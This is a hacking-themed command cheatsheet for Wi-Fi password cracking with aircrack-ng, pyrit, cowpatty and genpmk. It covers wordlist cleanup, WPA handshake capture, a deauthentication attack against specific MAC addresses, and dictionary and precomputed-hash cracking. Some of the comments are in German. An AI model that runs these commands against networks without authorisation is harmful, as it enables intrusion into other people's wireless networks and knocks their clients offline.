🖥️aircrack

➡️This is a command-line reference manual for commands and command combinations that you don’t use often enough to remember it. This cheatsheet explains the aircrack command with important options and switches using examples.

▁ ▂ ▃ ▄ ꧁ 🔴☠ COMMANDLINE-KUNGFU WITH CHEATSHEETS ☠🔴꧂▅ ▃ ▂ ▁

#   █████╗ ██╗██████╗  ██████╗██████╗  █████╗  ██████╗██╗  ██╗
#  ██╔══██╗██║██╔══██╗██╔════╝██╔══██╗██╔══██╗██╔════╝██║ ██╔╝
#  ███████║██║██████╔╝██║     ██████╔╝███████║██║     █████╔╝ 
#  ██╔══██║██║██╔══██╗██║     ██╔══██╗██╔══██║██║     ██╔═██╗ 
#  ██║  ██║██║██║  ██║╚██████╗██║  ██║██║  ██║╚██████╗██║  ██╗
#  ╚═╝  ╚═╝╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝
#

# some comands to get an clean worlist
#----------------------------------------#

#**Remove duplicates**
awk '!(count[$0]++)' old.txt > new.txt

#**Sort by length**
awk '{print length, $0}' old.txt | sort -n | cut -d " " -f2- > new.txt

#**Sort by alphabetical order**
sort old.txt | uniq > new.txt

#**Merge multiple text files into one**
cat file1.txt file2.txt > combined.txt

#**Remove all blank lines**
egrep -v "^[[:space:]]*$" old.txt > new.txt

# pyrit
#--------#

https://www.youtube.com/watch?v=ewBSTJJppmI
# Test Capture
pyrit -r test-01.cap analyze

#Verkleinern des handshakes
pyrit -r test-01.cap -o new_handshake strip

# Zeigt leistung auf
pyrit list_cores

# Schauen was in der Datenbank ist
pyrit eval

# Passwörter in die PyritDB aufnehmen
pyrit -i tmp/dict.txt import_passwords

# SSID erstellen 
pyrit -e MYSSID create_essid

# 
pyrit batch

# mit DB attacken
pyrit -r new_handshake attack_db

#
pyrit --all-handshakes -r new_handshake attack_db

# db exportieren
pyrit -o pyritdb.db -e AmIRootYet export_hashdb

##coWPAtty & Genpmk Pre computed hashes

# mir Aircrack die Pyrit DB verwenden
aircrack-ng test-01.cap --r pyritdb.db

#
cowpatty -s MYSSID -r /root/output-01.cap

#
genpmk -s MYSSID -d /root/output-hash.pmk -f /root/pass.txt

#
cowpatty -s MYSSID -r /root/output-01.cap -d /root/output-hash

# airlib, airmon, airdump, aireplay-ng
#------------------------------------#

airmon-ng start wlan0

airodump-ng --channel 6 --write ouput --bssid 00:24:01:24:0A:F6 mon0

aireplay-ng --deauth 6 -a 00:24:01:21:04 -c 00:22:FA:BC:8F:1A mon0

airolib-ng crackwpa --import passwd /root/pass.txt

airolib-ng crackwpa -import essid MYSSID

airolib-ng crackwpa -import essid essid

airolib-ng crackwpa --stats

airolib-ng crackwpa --clean all

airolib-ng crackwpa --batch

airolib-ng crackwpa --verify all
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░

  █║▌│║█║▌★ KALI ★ PARROT ★ DEBIAN 🔴 PENTESTING ★ HACKING ★ █║▌│║█║▌

              ██╗ ██╗ ██████╗  ██████╗ ██╗  ██╗███████╗██████╗
             ████████╗██╔══██╗██╔═══██╗╚██╗██╔╝██╔════╝██╔══██╗
             ╚██╔═██╔╝██║  ██║██║   ██║ ╚███╔╝ █████╗  ██║  ██║
             ████████╗██║  ██║██║   ██║ ██╔██╗ ██╔══╝  ██║  ██║
             ╚██╔═██╔╝██████╔╝╚██████╔╝██╔╝ ██╗███████╗██████╔╝
              ╚═╝ ╚═╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═╝╚══════╝╚═════╝

               █║▌│║█║▌ WITH COMMANDLINE-KUNGFU POWER █║▌│║█║▌

░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░